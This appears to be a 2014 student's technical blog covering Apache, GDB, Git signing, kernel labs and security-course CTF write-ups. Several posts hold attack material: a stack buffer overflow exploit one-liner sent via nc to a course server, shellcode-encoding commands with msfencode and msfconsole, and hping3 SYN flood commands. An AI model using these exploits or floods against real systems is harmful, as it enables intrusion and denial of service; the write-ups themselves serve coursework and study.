Friday, December 12, 2014

Debugging Apache Start/Reload

After adding a new virtual host config file for apache, I tried to reload apache, but getting following:
>> service apache2 reload
Reloading web server config: apache2 failed!
However, I also found that there's no apparent way to read the log which may tell why "apache2 failed" (no error in apache log as well). So, I used strace
strace -Ff service apache2 reload &> /tmp/t
Then by search "log" keyword in /tmp/t, we can get:
Process 62754 detached
[pid 62750] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 1}], 0, NULL) = 62754
[pid 62750] --- SIGCHLD (Child exited) @ 0 (0) ---
[pid 62750] rt_sigreturn(0x11)          = 62754
[pid 62750] write(1, "Action 'configtest' failed.\n", 28) = 28
[pid 62750] write(1, "The Apache error log may have mo"..., 48) = 48
[pid 62750] exit_group(1)               = ? 
Yes, here is it! It's saying that "configtest" is failed which is causing "apache failed".
So, here's comes a better way to debug my config file:
>> apachectl configtest
apache2: Syntax error on line 268 of /etc/apache2/apache2.conf: Syntax error on line 26 of /etc/apache2/sites-enabled/nphw3.conf: use of macro 'VHost' defined on line 2 of /etc/apache2/sites-enabled/nphw3.conf  with 2 arguments instead of 3
Action 'configtest' failed.
The Apache error log may have more information. 

Saturday, December 6, 2014

TLS/SSL Study Note


In the third assignment of "Network Security Practice", we are asked to trace TLS/SSL traffic package. I am writing down my understanding of TLS/SSL after studying on Wikipedia and other sites.



  2. SERVER A: serving the desired application services for CLIENT A
  3. SERVER B: the server which issues digital certification for SERVER A


  1. [CLIENT] → [SERVER A]
    • request secure connection
    • offer a list of supported cipher suites
  2. [SERVER A] → [CLIENT]: send back followings:
    • picked cipher/hash function
    • its identification (digital certificate), mostly contains:
      • servername
      • trusted certificate authority
      • public encryption key
  3. [CLIENT] → [SERVER B]: check validity of SERVER A
  4. [CLIENT] ←→ [SERVER A]: generate the session key
    • [CLIENT] encrypts a random number using received public key, then send out the result
    • [SERVER B] decrypts with its private key, then get the random number
  5. [CLIENT] ←→ [SERVER A]: start various application-layer communications by encrypting/decrypting with the picked hash function & the random number


Sunday, November 30, 2014

Git Commit with GPG Key


Creating a commit in Git is easy, it can be done by "git commit", and the author (name and email) is set by a parameter of this commit or by reading the setting from "~/.gitconfig"

Method 1: set the author in command parameter

$ git commit -am "bug fixed" --author="Author Name <>"

Method 2: reading the user setting

$ git config --global "Heron Yang"
$ git config --global
However, there's no way to guarantee the author is the person with right permission. So GPG is introduced here.

GPG Design Explain

It's also applying public-private key pair design like ssh-keygen. Normally, the author generates a pair of keys, which are public key and private key. It's okay for him to share out the public key, and that allows the other people to create encrypted content for this author by using the public key. However, no one can decrypt the content unless he or she has the private key.
So, by sharing the public and holding the private key on your machine allows the user to be recognised and certificated.

Git Command with GPG Key

Therefore, if we want to create a Git commit with certification, we should make Git work with GPG. Here's the steps (one should install GPG before starts):

A. Generate key pair

$ gpg --gen-key #few questions will pop up, lease your name/email/passphrase, and pick default for others

B. List generated keys

$ gpg --list-keys # list your keys
pub   2048R/xxxxxxxx 2014-11-30
uid       [ultimate] Heron Yang (genrate gpg) <>
sub   2048R/yyyyyyyy 2014-11-30
$ gpg --list-secret-keys # list private keys

C. Add your GPG into Git Config

Put your xxxxxxxx into Git configuration by doing:
$ git config --global user.signingkey xxxxxxxx

D. Commit and See if it works

Commit like this way:
$ git commit -S
Check log:
$ git log --show-signature
commit 252aa0dd0643d86df16b93b509a6a15b95xxxxxx
gpg: Signature made Sun Nov 30 13:52:57 2014 CST using RSA key ID xxxxxxxxgpg: Good signature from "Heron Yang (genrate gpg) <>" [ultimate]
Author: Heron Yang <>
Date:   Sun Nov 30 13:52:51 2014 +0800
    test gpg


Monday, November 17, 2014

Alphanumeric Shellcode of EXEC("/bin/sh") without binsh/BINSH Characters


This is one of the CTF tasks from "Secure Programming" course in NCTU.


Input: a string with following restrictions
  • Alphabets and Numbers only, which means: [0-9], [a-z], and [A-Z]
  • No "binsh/BINSH" characters
This string will be executed as machine code on the target server, which we call shellcode. So, we can guess that the program looks like this:

Workable Shellcode

First, let's ignore the restrictions first. We may need a test code to execute "bin/sh" successfully for further steps. And here's is it:

Also, by referring to the system call document, what we learn that the registers should be set before calling "INT 0x80":

  • EAX: 0x0b
  • EBX: Address of "bin/sh" string
  • ECX, EDX: 0x00 (optional)

Try: msfencode

cat shellcode.txt | msfencode BufferRegister=ECX -i sc.bin -e x86/alpha_mixed -t python -b 'binshBINSH'
This piece of code should give out our solution. However, the encoder returns error saying that it can't find the solution.

Write It on My Own

Since the existing encoder can't solve this problem, we now have to solve it on our own. The things we know so far:

Issue 1: Storing Arbitrary Value on Stack

  • PUSH a small random value into the stack
  • POP to ECX
  • DEC ECX to the wanted value
For larger wanted value:
  • PUSH a small random value into the stack
  • POP to EAX
  • XOR EAX, <value> (this may need to be done twice to gain the wanted value)
  • the value for XOR should be calculated manually
  • pick ECX for DEC/POP/PUSH instructions under our initial restrictions
  • pick EAX for XOR (0x35 opcode)

Issue 2: Storing Instructions on Stack

There are some instructions not accepted in our input shellcode, so we somehow generate the instructions as data and push them onto the stack. By having "-fno-stack-protector -z execstack" option while compiling in GCC, we can execute the pushed instructions later.

Issue 3: Move EIP to Stack

  • EIP is in the stack and pointing to the current shellcode
  • ESP is where our instructions ("POP EBX", "INT 0x80") is pushed on
It will be easy if we call a jump instruction to move the EIP to ESP, then our instructions will be executed. However, we only have o8 (8-bit immediately) jump instructions, which is not long enough to jump to ESP.
Therefore, I popped the stack in order to increase ESP in the begin of the shellcode.
  • POP ESP for many times: increase ESP value
  • make ESP locates after (and close to) the end of our shellcode
  • call a small 8-bit jump to our stack (where "POP EBX", "INT 0x80" locate)


Here's my solution:

And, the details are in my Github repo.

Wednesday, October 29, 2014

Radare2 Memo


Radare2 is a handy tool for analysing binary code, which offers a clean and fast way to browser binary file in assembly code. Here, I am writing down common commands I use so far:
  • fs: view flag sections
  • fs symbols: switch to "symbols" flag sections
  • f: show flag list of current symbol section
  • s main: jump to main (flag)
  • af: analysis function
  • pdf: view current function in assembly code
  • V: visual mode
  • p (in visual mode): switch between different view methods
  • q (in visual mode): quit visual mode
  • e asm.syntax=(intel|att): change asm code syntax


Sunday, October 26, 2014

msfconsole Memo

In Secure Programming assignment, we are asked to get the flag on the server using shellcode solution. So, I've studied msfconsole and written some notes here:

Pick Target Platform / Action

First step, pick pick your target platform and the action using 'use' command. For example: use payload/linux/x86/exec


'show encoders' to view the encoder list.

Generate Code

Generate your result by 'generate' command. And the options are as below
  • -h: see the help text
  • -b <opt>: the list of characters to avoid, ex. '\x00\xff'
  • -e <opt>: the name of the encoder module to use
  • -f <opt>: the output file name (otherwise stdout)
  • -i <opt>: the number of encoding iterations
  • -o <opt>: a comma separated list of options in VAR=VAL format
  • -s <opt>: add NOOP characters
  • -t <opt>: the output format: raw, ruby, rb, perl, pl, c, js_be, je_le, java, dll ...


  • You can execute shell commands in msfconsole directly.


Saturday, October 25, 2014

Detecting SSL in PHP on Heroku

In order to have a certified connection, websites would like to the user to use HTTPS instead of HTTP. However, sometimes we can't control what's the URL that the user request, which means that the user may ask for instead of

So, to solve this problem, we detect that if the user is requesting HTTP URLs. And, if yes, response 301 to the user to ask him to redirect to our HTTPS site.

Normal, if we implement it in PHP, add the following code in the front of the file:

However, on Heroku, they don't have $_SERVER['HTTPS'] but $_SERVER['HTTP_X_FORWARDED_PROTO']) instead. So, we do:

Thursday, October 23, 2014

GDB Memo


GDB was a scaring tool for me years ago; however, I found it's actually pretty handful. And, instead of Googling the commands every time, I am writing down the common ones I use in this post:

Common Commands


  • kill: stop exec
  • run: start execution
  • quit
  • help


  • <ctl-c>: break exec
  • continue
  • list: see where's the exec stops
  • next: will go 'over' the function calls
  • step: will go 'into' the function calls
  • print variable: see variable
  • finish: return from a function

Call Stack

  • backtrace
  • info frame
  • info locals
  • info args


  • break line number
  • break function name
  • tbreak: same as break but only stops once (temporary breakpoint)
  • info breakpoints
  • disable breakpoint number
  • ignore breakpoint number times: ignore the break point for number of times


  • watch variable
  • rwatch variable: read watchpoint
  • awatch variable: read/write watchpoint
  • * info breakpoints
  • * disable breakpoint number


char *s = "hello!\n"
  • x/s s: print string
  • x/c s: print s[0]
  • x/4c s: print s[0]~s[3]
  • x/t s: print first 32 bit
  • x/x s: print 8 bytes in hex
  • info registers
  • core core: see core dump crash
  • nexti: 'next' for instruction level
  • stepi: 'step' for instruction level
  • disassemble function name

Other Helpful Commands

  • info proc
  • frame: show where am I

Print Variables (Organised)

  • * info variables: list "All global and static variable names"
  • * info locals: list "Local variables of current stack frame" (names and values), including static variables in that function
  • * info args: list "Arguments of the current stack frame" (names and values)

More: Fork

  • set follow-fork-mode mode: follow which process after fork
    • mode -> parent, child
    • show follow-fork-mode
  • set detach-on-fork mode (reference)
    • mode -> on, off
    • on(default): the child process (or parent process, depending on the value of follow-fork-mode) will be detached and allowed to run independently.
    • off: both processes will be held under the control of GDB. One process (child or parent, depending on the value of follow-fork-mode) is debugged as usual, while the other is held suspended.
    • show detach-on-fork
  • set follow-exec-mode mode
    • mode -> new, same


Thursday, October 16, 2014

Install UNIX Version 1 (1972) on Linux

I am now reading the classic book, "The Unix Programming Environment", which was written in 1990s. It was suggested by my seniors, and the author is from Bell Labs, so it should be a nice book to learn the original design of UNIX.

However, while I was testing the commands in the book, I found that my environment is pretty different from the author's. So, I am building up his environment, UNIX version (1972, I guess), for fun.

Step 1. Setup Simulator

We simulate the old environment by using simhv simulator.

Step 2. Download UNIX

Download the UNIX code from qrush's github.

Step 3. Setup Image Files

qrush's image file was not working currently on my machine, so I found another image files to replace it.


I wrote a Makefile to done all the tasks, and here's it:

* note: I found that the bash requires extremely large resources, which may be implemented by using some busy-waiting stuff.

Wednesday, October 15, 2014

Nagios - Server Monitoring

In order to get notifications when any of my services is down. I've installed Nagios on my server. Here are the sites I referred to while installation:


Further Configuration for Notification:


Things have to be noticed while referring to the two sites:
  • restart apache after add new config file for Nagios
  • update your email address in contacts.cfg (in order to receive the mail)

Wednesday, October 1, 2014

Stack Buffer Overflow

In the course, Secure Programming, we are asked to solve wargame problems. Here comes the first practice: Stack Buffer Overflow.


void do_magic(char *buf,int n){
        int i;
                buf[i] ^= rand()%256;

void magic(){
        char magic_str[60];

Goal: Get the flag!


The structure looks like this: local variable stack -> frame pointer -> return address. And, our goal is to replace the content of return address, and make the program start to run unwanted function.

[Solution 1] Disassemble the bin file.

You can apply any of following tools:
  1. objdump: objdump -d magic
  2. Online decompiler:
  3. IDA Pro
And, I can get:
08048681 <magic>:
 8048681:       55                      push   %ebp
 8048682:       89 e5                   mov    %esp,%ebp
 8048684:       83 ec 58                sub    $0x58,%esp
 8048687:       8d 45 bc                lea    -0x44(%ebp),%eax
 804868a:       89 44 24 04             mov    %eax,0x4(%esp)
 804868e:       c7 04 24 36 88 04 08    movl   $0x8048836,(%esp)
 8048695:       e8 66 fe ff ff          call   8048500 <__isoc99_scanf@plt>

We can learn that the character array size would be 0x44 = 68. And, should add 4 for frame pointer.
*note: "ESP is the current stack pointer. EBP is the base pointer for the current stack frame."

[Solution 2] GDB debug analysis

>> gdb magic
(gdb) b magic
(gdb) run
(gdb) disas
Dump of assembler code for function magic:
   0x08048681 <+0>:     push   %ebp
   0x08048682 <+1>:     mov    %esp,%ebp
   0x08048684 <+3>:     sub    $0x58,%esp
   0x08048687 <+6>:     lea    -0x44(%ebp),%eax
   0x0804868a <+9>:     mov    %eax,0x4(%esp)
   0x0804868e <+13>:    movl   $0x8048836,(%esp)
   0x08048695 <+20>:    call   0x8048500 <__isoc99_scanf@plt>
=> 0x0804869a <+25>:    lea    -0x44(%ebp),%eax
   0x0804869d <+28>:    mov    %eax,(%esp)
   0x080486a0 <+31>:    call   0x80484d0 <strlen@plt>
   0x080486a5 <+36>:    mov    %eax,0x4(%esp)
   0x080486a9 <+40>:    lea    -0x44(%ebp),%eax
   0x080486ac <+43>:    mov    %eax,(%esp)
   0x080486af <+46>:    call   0x8048621 <do_magic>
   0x080486b4 <+51>:    lea    -0x44(%ebp),%eax
   0x080486b7 <+54>:    mov    %eax,0x4(%esp)
   0x080486bb <+58>:    movl   $0x8048836,(%esp)
   0x080486c2 <+65>:    call   0x8048460 <printf@plt>
   0x080486c7 <+70>:    leave
   0x080486c8 <+71>:    ret
(gdb) info registers
eax            0x1      1
ecx            0x1      1
edx            0xf7fb88c4       -134510396
ebx            0xf7fb6ff4       -134516748
esp            0xffffd560       0xffffd560
ebp            0xffffd5b8       0xffffd5b8
esi            0x0      0
edi            0x0      0
eip            0x804869a        0x804869a <magic+25>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Try different size of inputs until ebp is modified, and we can know the size for stack buffer overflow.


(python -c 'print "heron\n" + "\x00"*72 + "\x0e\x86\x04\x08"' && cat) | nc 6666
  • ( python ... && cat ) is designed for not passing EOF to nc, which may close the connection before we interact with it.
  • \x0e\x86\x04\x08 is the address of the function we want the program to run, and it's indicated in little endian.


Tuesday, August 12, 2014

Paper, Slingshot, Snapchat

You get to know these three Apps. Slingshot, Snapchat are bringing the user experience of IM into next generation, which is must lighter and faster. Paper is redesigning the way we think of Facebook.

Paper (Facebook)

Its UI is never seem at other place, and the user is having different sections to follow. Folding and unfolding interface is very fun and user-friendly.

Slingshot (Facebook)

It's released on 7/31, 2014, which is pretty new at this point. Facebook is trying to create a new photo-based IM experience. This may be inspired by Snapchat.

Snapchat (Rejected Facebook's $3 Billion Offer)

Snapchat is pretty famous for rejecting Facebook's $3 Billion offer, and it's popular for teenagers. It's fun, you are having a pretty light chatting experience, and don't have to worry too much on telling secrets. Ha.

If You Can't Find Them on App Store...

Some of them may just available on U.S. market; however, it is pretty easy to switch your account to different region (switch your account to U.S if you're not in U.S):

  1. Click on "Apple ID" at the bottom of "Featured" tab in App Store
  2. Click on "View Apple ID", it may request for your password
  3. Click on "Country/Region", pick "United State", and you will set them up correctly by pressing many times of "Next" button


Sunday, June 29, 2014

PaaS: Google AppEngine v.s. Heroku



I am putting "Reference" section as the first section in this post because that I am writing this post totally based on the refereces.


Language Support

Google AppEngine: Python, Java, PHP, Go / Cloud SQL(MySQL compatible)
Heroku: Ruby, Java, Node.js, Python, PHP, Clojure, Scala / PostgreSQL, MongoDB, Cloudant, Redis

Comments for Google AppEngine

AppEngine’s proprietary, read-only nature results in tedious and unnecessary code refactoring; apps have to be written specifically with AppEngine in mind, API’s have to be written specifically for AppEngine, even standard Java code has to be extensively altered to fit into the AppEngine environment.

Google insists on AppEngine customers only using its BigTable non-relational database, although they have also recently added some support for CloudSQL.

Comments for Heroku

Heroku’s database-platform choices reflect a collection that is in widespread use already in the wider world.

Comments on Both

Heroku’s database-platform choices reflect a collection that is in widespread use already in the wider world.

My Summary

I only have a little developing experience on both PaaS platforms. However, from the referece I found, more people suggest Heroku than Google AppEngine. It's because that Google AppEngine is tie-in, lack of flexibility, and hard to move to regular VPS if needed.

IaaS, PaaS, SaaS


To start a new web-based project (mainly HTTP/HTTPS-related things), we do have multiple choices for the platform. We can host a whole virtual machine, like AWS or Linode. Or, we can host put our code on Google Appengine or Heroku. They all have different pros and cons, and we should pick the one which matches the purpose of the project.

SaaS: Software as a Service


  • Gmail
  • Google+

PaaS: Platform as a Service

One can develop applications and let them execute on top of the platform which take care of the execution.

Vendors manage:

  • runtime
  • middleware
  • O/S
  • virtualizatoin
  • server
  • storage
  • networking

Users manage:

  • application
  • data


  • Heroku
  • Google App Engine

IaaS: Infrastructure as a Service

Users buy fully outsource service (the whole virtual machine)


  • AWS(Amazon Web Services)
  • Linode


Friday, June 13, 2014

SYN Flood DDOS Defense in Kernel Code


Kernel 2.6.32


SYN Flood DDOS is still a big headache for system administrators, and we don't really have a solution for this kind of attack so far in the real world.
To start a connection between a server and a client, they have to perform "TCP 3-Way Handshake" first without any failure:
  1. client -> server: SYN
  2. server -> client: SYN-ACK
  3. client -> server: ACK
* SYN/ACK are signal bits in TCP packages.
However, not everyone in the internet is friendly and follow every rule we have. An attacker may only send SYN-package (first step in the 3-Way Handshake) but with pretty large amount, the server then may run out of resource since there are too many half-open connections. And, the attacker can even apply random IP source in the packages so that the server is not able to distinguish the bad/good clients.


In Kernel code, there's a hash table with request socket queues as entries. Whenever the new sock request (SYN-package) comes, it's inserted into this queue-entry hash table.
However, of course, the capability is limit, Kernel has to dropped some request sockets to allow new sockets with the table is full. In the original Kernel code, it kills old sockets every 0.2 second in net/ipv4/inet_connection_sock.c:inet_csk_reqsk_queue_prune.
Comparing to the original code, in this last OSDI lab, we are not relied on the regular routine to drop old request sockets, but we are randomly dropping a socket in the table when a new socket request comes and the table is full.


Modify the Original Pruning Routine

In net/ipv4/inet_connection_sock.c:inet_csk_reqsk_queue_prune add following in line 513:
        thresh = max_retries;

Randomly Dropping Socket when Is Full

After tracing the code, we know that the function reqsk_queue_is_full is called whenever the TCP program wants to add a new sock in the request queue. So we simply add some code in the this function.
static inline int reqsk_queue_is_full(struct request_sock_queue *queue)
    struct listen_sock *lopt = queue->listen_opt;
    struct request_sock **reqp, *req;
    int i, range, random;
    unsigned long now = jiffies;

    int r = (queue->listen_opt->qlen >> queue->listen_opt->max_qlen_log);

    printk("[OSDI] qlen = %d\n", lopt->qlen);
    if( r ) {

        range = lopt->nr_table_entries;
        printk("range = %d\n", range);

        random %= range;
        get_random_bytes(&random, sizeof(range));

        i = lopt->clock_hand;
        do {
            i = (i + 1) & (lopt->nr_table_entries - 1);
        } while (--random > 0);

        printk("i=%d first is killed\n", i);

        if ((req = *reqp) != NULL) {
            if (time_after_eq(now, req->expires)) {
                /* OSDI lab12 */
                reqsk_queue_unlink(queue, req, reqp);
                reqsk_queue_removed(queue, req);
        lopt->clock_hand = i;


    // get the result again
    return queue->listen_opt->qlen >> queue->listen_opt->max_qlen_log;
We first calculate the original result for is_full or not. If it's full, then we random pick on queue entry from the table and drop the first element of the queue.


Method 1 - Use iptables (Firewall)

Use both simple user socket programs on two machines. One is the client, another is the server. Make sure they can connect at the beginning (the routing is okay between these two machines/VMs). Then, drop any packets from the server on the client by setting up the firewall so that we will only send SYN-packages to the server.
sudo iptables -A INPUT -s <SERVER_IP> -j REJECT

Method 2 - Use hping3

sudo hping3 -i u1 -S -c 10 <SERVER_IP>

Another DDOS Experiment in our Workshop

The attacked server (right-hand side) is having a high CPU usage while another server (left-hand side) is send SYN Flood packages.

Wednesday, May 21, 2014

[OSDI] ramfs XOR Encryption/Decryption while Read/Write in Kernel Code

This time, in our OSDI lab, we are asked to implement a XOR Encryption/Decryption while someone is read/write the ramfs.

Setup the Flag (switch on/off the encryption/decryption feature)

Register a proc_dir_entry in fs/ramfs/inode.c to listen the external controls of the flag. A proc_read and a proc_write function is required. So...

Global Variables & Macros

#define MAX_PROC_SIZE 100
int ramfs_flag;
static struct proc_dir_entry *proc_entry;

(register) Modify init_ramfs_fs

static int __init init_ramfs_fs(void)
    // ODSI lab 10
    proc_entry = create_proc_entry("flag", 0644, NULL);
    proc_entry->read_proc = my_read;
    proc_entry->write_proc = my_write;
    ramfs_flag = 0;
    return register_filesystem(&ramfs_fs_type);

(remove) Modifiy exit_ramfs_fs

static void __exit exit_ramfs_fs(void)
    // ODSI lab 10
    remove_proc_entry("flag", NULL);

(read) Add proc_read Handler

static int my_read(char *buf, char **start, off_t offset, int count, int *eof, void *data) {
    int len=0;
    len = sprintf(buf,"%d\n", ramfs_flag);

    return len;

(write) Add proc_write Handler

static int my_write(struct file *file, const char *buf, unsigned long count, void *data) {

    char t_data[MAX_PROC_SIZE];
    if(copy_from_user(t_data, buf, count))      return -EFAULT;

    if(t_data[0] != '0' && t_data[0] != '1'){
        printk("garbage ignored\n");
        return count;   // just ignore
    printk("my_write get : %s\n", t_data);

    // success setup
    if(t_data[0] == '0')                        ramfs_flag = 0;
    else if(t_data[0] == '1')                   ramfs_flag = 1;
    printk("ramfs_flag = %d ramfs_addr = %p\n", ramfs_flag, &ramfs_flag);
    return count;


Implement the Encryption/Decryption when the Flag is Up

Make our Flag Accessible by the MMU (fs/ramfs/internal.h)

extern const struct address_space_operations ramfs_aops;
extern const struct inode_operations ramfs_file_inode_operations;
extern int ramfs_flag;

Switch to Our Custom Handlers for MMU Read/Write (mm/file-mmu.c)

const struct file_operations ramfs_file_operations = {
 .read  = do_sync_read,
 .aio_read = my_aio_read,   // OSDI lab 10
 .write  = do_sync_write,
 .aio_write = my_aio_write,   // OSDI lab 10
 .mmap  = generic_file_mmap,
 .fsync  = simple_sync_file,
 .splice_read = generic_file_splice_read,
 .splice_write = generic_file_splice_write,
 .llseek  = generic_file_llseek,

Encryption (mm/file-mmu.c)

ssize_t my_aio_write(struct kiocb *iocb, const struct iovec *iov, unsigned long nr_segs, loff_t pos) {

    printk("OSDI: custom write\n");
    if(ramfs_flag && iov!=NULL) {
        size_t i;
        char *ib = (char *)iov->iov_base;
        for( i=0 ; i < iov->iov_len ; i++ )   ib[i] ^= ENCODE_KEY;
        printk("ramfs_flag is up\n");

    return generic_file_aio_write(iocb, iov, nr_segs, pos);

Decryption (mm/file-mmu.c)

ssize_t my_aio_read(struct kiocb *iocb, const struct iovec *iov, unsigned long nr_segs, loff_t pos) {
    ssize_t r;
    printk("OSDI: custom read\n");
    r = generic_file_aio_read(iocb, iov, nr_segs, pos);
    if(ramfs_flag) {
        size_t i;
        char *ib = (char *)iov->iov_base;
        for( i=0 ; i < iov->iov_len ; i++ )   ib[i] ^= ENCODE_KEY;
        printk("ramfs_flag is up\n");
    return r;

p.s. ENCODE_KEY can be any character size constant (ex. 0x25)

Run & Test

It should be something like this:
>> mount -t ramfs ramfs /mnt/ramfs/
>> cd /mnt/ramfs/
>> cat /proc/flag
>> echo 1 > /proc/flag
>> cat /proc/flag
>> echo hello > test
>> cat test
>> echo 0 > /proc/flag
>> cat test


Apache a2ensite with "Error! Site Does Not Exists"


I am now using "Apache/2.4.9 (Ubuntu)". After editing apache configuration file for my virtual hosted site (, I found an error while trying to enable my site:
>> sudo a2ensite

however, it returns:
"Error: does not exists"


So, I start to trace the problem. a2ensite is simply a perl script, we can open it with a text editor, and I saw:

This means that only filenames with ".conf" at the end is allowed. Therefore, I have to rename my setting file for
mv /etc/apache2/sites-available/ /etc/apache2/sites-available/
This time, it works!


I don't understand why the developer of this code brought out this design. Lots of people are used to name the configuration with their site domain name with ".conf". And, the developer should display more error message if ".conf" is required instead of only showing "does not exists" message.


Tuesday, May 20, 2014

Post on Facebook Page using Facebook Graph API

Actually, Facebook offers a great API that is flexible and simple. However, I feel that is hard to get started if lacking the passion to read their document.

* I'm using as my host server for example here.


  • Read Facebook Official Document - Access Token
  • Create a Facebook App on Developer Facebook
    • find out App ID and App Secret, you will need them later
    • put in Settings->Website->Site URL and Mobile Site URL
    • since we will need "manage_pages" permission, select it from the list and submit for approve by Facebook (it takes around a week)
  • Create a simple file that prints GET parameters on your server code. Ex, put <?php print_r($_GET);?> as index.php in


  • App ID
  • App Secret
  • URL (
  • code
  • access_token
  • Facebook Page ID
  • message (the content you want to post on the page)

Facebook Graph APIs

  •<App ID>&redirect_uri=,publish_stream
    • you will get "code" from GET parameters in
  •<App ID>&redirect_uri=<App Secret>&code=<code>
    • you will get "access_token" and its expire time
    • this checks the user's account information (his/her Facebook pages)
  •<Facebook Page ID>/feed?access_token=<access_token>&message=<message>
    • the message is posted on the page



Wednesday, May 7, 2014

[OSDI] Adding Snapshot Feature for Block Devices in Kernel Code

It's the 8th lab for the OSDI course. This one is fun and interesting. We are asked to write a snapshot taking code in kernel code, so we can go back to the past status of a block device.

How to Implement

We are adding two new ioctl numbers to the block devices. One is SNAPSHOT, and another is ROLLBACK. By calling SNAPSHOT, the kernel code switch to the snapshot mode, and things are written into shadow pages instead of normal pages. By calling ROLLBACK, the shadow pages are removed, and we are back to the previous stage (snapshot).

Edit drivers/block/brd.c

I am editing the kernel code on version (original here)

Global and Macros

  • pick not-used ioctl (I/O control) number for our custom ioctl number
  • MASK for distinguishing normal pages and shadow pages in page->index. I am using the most significant bit. If 1, it's a shadow page; otherwise, a normal page.
    • #define SHADOW_MASK (1 << ((sizeof(pgoff_t))*8-1))

Modify brd_lookup_page

Add the following to handle page lookup actions when snapshot is enabled:
    if( snapshot_enable ) {
        // is read request? yes
        // read from shadow page if exist
        idx = (sector >> PAGE_SECTORS_SHIFT) | SHADOW_MASK; // shadow
        page = radix_tree_lookup(&brd->brd_pages, idx);

        BUG_ON(page && page->index != idx);
        if( page ){
            printk("[osdi] one shadow page is created\n");
            return page;
This means that when snapshot is enabled, we return its shadow page if exists.

Modify brd_insert_page

Add the following code at the beginning:
if (!snapshot_enable && page)   return page;
if (snapshot_enable && page && ((page->index & SHADOW_MASK)!=0))    return page;

And, add the following line before "radix_tree_insert":
if (snapshot_enable)    idx |= SHADOW_MASK;
So, this means that if it's under snapshot mode, we should always insert pages into shadow pages (if there's no a shadow page for it so far, then create one). If it's not under snapshot mode, then follow the old rules.

Modify brd_ioctl

Make sure that we detect the new ioctl numbers and call their handlers.

static int brd_ioctl(struct block_device *bdev, fmode_t mode,
                        unsigned int cmd, unsigned long arg)
    int error;
    struct brd_device *brd = bdev->bd_disk->private_data;

    if (cmd == BLKFLSBUF) {
        return error;
    else if (cmd == SNAPSHOT) {
        error = snapshot_handler();
        return error;
    else if (cmd == ROLLBACK) {
        error = rollback_handler(bdev);
        return error;
    return -ENOTTY;


static int snapshot_handler() {
    snapshot_enable = TRUE;
    return 0;

static int rollback_handler(struct block_device *bdev) {
    int error = 0;
    struct brd_device *brd = bdev->bd_disk->private_data;

    snapshot_enable = FALSE;

    if(error)   printk("[osdi] error = %d\n", error);
    return error;

* brd_free_shadow_pages is almost as same as brd_free_pages but adding "if( (pages[i]->index & SHADOW_MASK)==0 )" in the beginning of the for loop.

Full Code ( drivers/block/brd.c )

In this codepad, please let me know if the link is not working.

User Programs

To control our devices, we need to write our user programs. Here, we will use /dev/ram0 as our block device.


#include <unistd.h>
#include <sys/ioctl.h>
#include <fcntl.h>

#include <stdio.h>

#define SNAPSHOT _IO(0x10, 30)

int main() {

    int fb;

    fb = open("/dev/ram0", O_RDWR);
    if( fb<0 ) {
        printf("can't access the device\n");
        return -1;
    ioctl(fb, SNAPSHOT, 0);

    return 0;



#include <stdio.h>

#define ROLLBACK _IO(0x10, 31)

int main() {

    int fb;

    fb = open("/dev/ram0", O_RDWR);
    if( fb<0 ) {
        printf("can't access the device\n");
        return -1;
    ioctl(fb, ROLLBACK, 0);

    return 0;


        -$(CC) ROLLBACK.c -o ROLLBACK
        -$(CC) SNAPSHOT.c -o SNAPSHOT

Run & Test

  • sudo mke2fs -m 0 /dev/ram0 # format the ram partition to ext2
  • sudo mkdir /ramdisk/
  • sudo mount /dev/ram0 /ramdisk/
  • sudo mount # check if it's mounted successfully
  • sudo mkdir /ramdisk/TEST1
  • sudo umount /ramdisk/
We've created a directory called "TEST1", and umount the ram disk. It's time to take a snapshot!
  • sudo ./SNAPSHOT
  • sudo mount /dev/ram0 /ramdisk/
  • sudo mkdir /ramdisk/TEST2
  • sudo umount /ramdisk/
Now, we've create the second directory called "TEST2", and it's time to test rollback.
  • sudo ./ROLLBACK
  • sudo mount /dev/ram0 /ramdisk/
  • ls /ramdisk 
In the last command, we should only see the folder "TEST1" without "TEST2". So, the snapshot works!

Question Raised

Q: Why we always umount the device when running our SNAPSHOT or ROLLBACK user program in this lab?
A: Since we are checking if the device is being used or not in ROLLBACK, we should umount before asking the device to ROLLBACK.

Tuesday, May 6, 2014

Vim + LaTeX


I've played around LaTeX this morning. There are different tools for compiling LaTeX files.

Online Web Tools

Writing LaTeX online is possible. It's easy to share the files and no need to install any extra software on the machine. However, it has a long latency for PDF preview. Some good web-based LaTeX editors are as below:

Desktop GUI Tools


Desktop Command Tools

Under Fedora, install:
  • sudo yum install tetex-latex
Simple setup in .vimrc:
  • map \t <ESC>:!pdflatex %<CR><CR>

Sunday, May 4, 2014

Defend from DirBuster (avoid brute force directories and files names on web/application servers)

* Trying to brute force directories and files names on deployed servers is ILLEGAL!

Some fake hackers like to hack deployed servers by using tools like "DirBuster"; however, it's easy to defend. Also remember that applying brute force on deployed server is ILLEGAL and that will get you into trouble.

I am using IP as the attacker's IP here.

1. Ban the attacker's IP

In the apache setting file add:
<Location />
        Order deny,allow
        Deny from

2. Setup mod_evasive

Follow the instruction here, which is:
  • apt-get install apache2-utils
  • make sure module configuration is on in Apache setting:
    • Include mods-enabled/*.load
    • Include mods-enabled/*.conf
  • configure DOS parameters by adding following into .conf file of the site
<IfModule mod_evasive20.c>
DOSHashTableSize 3097
DOSPageCount 2
DOSSiteCount 50
DOSPageInterval 1
DOSSiteInterval 1
DOSBlockingPeriod 60
To test, run this perl script:

3. Setup Nagios with notifications

Setup a system monitoring program on the server, so if there's anything abnormal the administrator will receive emails immediately. Check:

Saturday, May 3, 2014

Start VMWare Fusion from Script

I am now using VMWare Fusion, and not willing to switch between the terminal and VMWare manager. So, I came up this script which allow me to start the VM and ssh into the machine by one-line command.

./kali start
./kali stop
./kali status

Wednesday, April 30, 2014

[OSDI] Read Frame Usage in Kernel Code


When a user-space process ask for memory spaces, the kernel may give out some "pages" which can be located by virtual addresses. However, kernel only gives out real physical memory space when the process start to write data on that address. That is, the pages are able to convert to a real page "frame" after their first write.
The conversion is done by looking up the page table. The page table is different from process to process, and it is stored in every process memory descriptor.


In Linux kernel, the structure and their hierarchies can be listed below:
  • task_struct: this describes a process
    • (char *) comm: name of the process
    • (struct mm_struct *) mm: memory descriptor of the process
      • (struct vm_area_struct *)mmap: start pointer for virtual memory areas
And, the virtual memory area of a process is a linked list structure in kernel code, so we start from the first one which is stored in task->mm.
  • vm_area_struct: a virtual memory area
